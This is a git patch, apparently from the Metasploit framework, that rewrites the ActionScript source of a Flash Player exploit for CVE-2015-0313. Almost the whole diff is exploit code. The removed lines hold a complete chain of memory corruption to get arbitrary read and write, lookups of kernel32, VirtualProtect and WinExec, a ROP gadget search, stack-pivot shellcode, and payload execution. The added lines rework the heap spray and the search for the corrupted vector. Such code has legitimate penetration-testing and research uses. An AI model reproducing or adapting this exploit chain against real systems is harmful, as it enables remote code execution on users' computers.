From d95a0f432deb7df80becea792ddbc3b7a323be4b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 10 Jun 2015 09:12:25 -0500 Subject: [PATCH] Update AS codE --- .../source/exploits/CVE-2015-0313/Main.as | 178 ++++-------------- 1 file changed, 38 insertions(+), 140 deletions(-) diff --git a/external/source/exploits/CVE-2015-0313/Main.as b/external/source/exploits/CVE-2015-0313/Main.as index b25008234d..6c978e8d90 100755 --- a/external/source/exploits/CVE-2015-0313/Main.as +++ b/external/source/exploits/CVE-2015-0313/Main.as @@ -23,8 +23,8 @@ import mx.utils.Base64Decoder public class Main extends Sprite { - private var ov:Vector. = new Vector.(25600) - private var uv:Vector. = new Vector. + private var ov:Vector. = new Vector.(80000) + private var uv:Vector. private var ba:ByteArray = new ByteArray() private var worker:Worker private var mc:MessageChannel @@ -39,26 +39,28 @@ public class Main extends Sprite private function mainThread():void { - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - payload = b64.toByteArray().toString() + // var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + // var pattern:RegExp = / /g; + // b64_payload = b64_payload.replace(pattern, "+") +// b64.decode(b64_payload) +// payload = b64.toByteArray().toString() ba.length = 0x1000 ba.shareable = true for (var i:uint = 0; i < ov.length; i++) { - ov[i] = new Vector.(1014) - ov[i][0] = ba - ov[i][1] = this + ov[i] = new Vector.(1014) + ov[i][0] = 0xdeedbeef } - for (i = 0; i < ov.length; i += 2) delete(ov[i]) + for (i = 0; i < ov.length / 2; i += 2) { + delete(ov[i]) + } worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) mc = worker.createMessageChannel(Worker.current) mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage) worker.setSharedProperty("mc", mc) worker.setSharedProperty("ba", ba) ApplicationDomain.currentDomain.domainMemory = ba + Logger.log("starting...") worker.start() } @@ -70,141 +72,37 @@ public class Main extends Sprite ov[0] = new Vector.(1022) mc.send("") while (mc.messageAvailable); - ov[0][0] = ov[0][0x403] - 0x18 - 0x1000 - ba.length = 0x500000 - var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + 0x100000 - var main:uint = ov[0][0x409] - 1 - var vtable:uint = vector_read(main) - vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8) - vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff) - mc.send(ov[0][0].toString() + "/" + buffer.toString() + "/" + main.toString() + "/" + vtable.toString()) + for (var i:uint = 0; i < 20000; i++) { + if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) { + ov[0][i] = 0xffffffff + break + } + } + ov[0][0xfffffffe] = 1014 + mc.send("") } private function onMessage(e:Event):void { - casi32(0, 1022, 0xFFFFFFFF) - if (ba.length != 0xffffffff) mc.receive() + Logger.log("[*] onMessage") + var mod:uint = casi32(0, 1022, 0xFFFFFFFF) + Logger.log("[*] onMessage - mod: " + mod.toString()) + if (mod == 1022) mc.receive() else { - ba.endian = "littleEndian" - var data:Array = (mc.receive() as String).split("/") - byte_write(parseInt(data[0])) - var buffer:uint = parseInt(data[1]) as uint - var main:uint = parseInt(data[2]) as uint - var vtable:uint = parseInt(data[3]) as uint - var flash:uint = base(vtable) - var ieshims:uint = module("winmm.dll", flash) - var kernel32:uint = module("kernel32.dll", ieshims) - - var virtualprotect:uint = procedure("VirtualProtect", kernel32) - var winexec:uint = procedure("WinExec", kernel32) - var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) - var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) - - //CoE - byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable - byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main - byte_write(0, "\x89\x03", false) // mov [ebx], eax - byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret - - byte_write(buffer+0x200, payload); - byte_write(buffer + 0x20070, xchgeaxespret) - byte_write(buffer + 0x20000, xchgeaxesiret) - byte_write(0, virtualprotect) - - // VirtualProtect - byte_write(0, winexec) - byte_write(0, buffer + 0x30000) - byte_write(0, 0x1000) - byte_write(0, 0x40) - byte_write(0, buffer + 0x100) - - // WinExec - byte_write(0, buffer + 0x30000) - byte_write(0, buffer + 0x200) - byte_write(0) - - byte_write(main, buffer + 0x20000) - toString() + Logger.log("[*] onMessage - Searching corrupted vector...") + for (var i:uint = 0; i < ov.length; i++) { + if (ov[i].length == 0xffffffff) { + uv = ov[i] + } else { + ov[i] = null + } + } + if (uv == null) { + Logger.log("not found") + return + } + Logger.log('whooray: ' + uv.length.toString(16)) } } - - private function vector_write(addr:uint, value:uint = 0):void - { - addr > ov[0][0] ? ov[0][(addr - uv[0]) / 4 - 2] = value : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1] = value - } - - private function vector_read(addr:uint):uint - { - return addr > ov[0][0] ? ov[0][(addr - ov[0][0]) / 4 - 2] : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1] - } - - private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void - { - if (addr) ba.position = addr - if (value is String) { - for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) - if (zero) ba.writeByte(0) - } else ba.writeUnsignedInt(value) - } - - private function byte_read(addr:uint, type:String = "dword"):uint - { - ba.position = addr - switch(type) { - case "dword": - return ba.readUnsignedInt() - case "word": - return ba.readUnsignedShort() - case "byte": - return ba.readUnsignedByte() - } - return 0 - } - - private function base(addr:uint):uint - { - addr &= 0xffff0000 - while (true) { - if (byte_read(addr) == 0x00905a4d) return addr - addr -= 0x10000 - } - return 0 - } - - private function module(name:String, addr:uint):uint - { - var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 - while (true) { - var entry:uint = byte_read(iat + (++i) * 0x14 + 12) - if (!entry) throw new Error("FAIL!"); - ba.position = addr + entry - if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break - } - return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) - } - - private function procedure(name:String, addr:uint):uint - { - var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) - var numberOfNames:uint = byte_read(eat + 0x18) - var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) - var addressOfNames:uint = addr + byte_read(eat + 0x20) - var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) - for (var i:uint = 0; ; i++) { - var entry:uint = byte_read(addressOfNames + i * 4) - ba.position = addr + entry - if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break - } - return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) - } - - private function gadget(gadget:String, hint:uint, addr:uint):uint - { - var find:uint = 0 - var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) - var value:uint = parseInt(gadget, 16) - for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break - return addr + i - } } }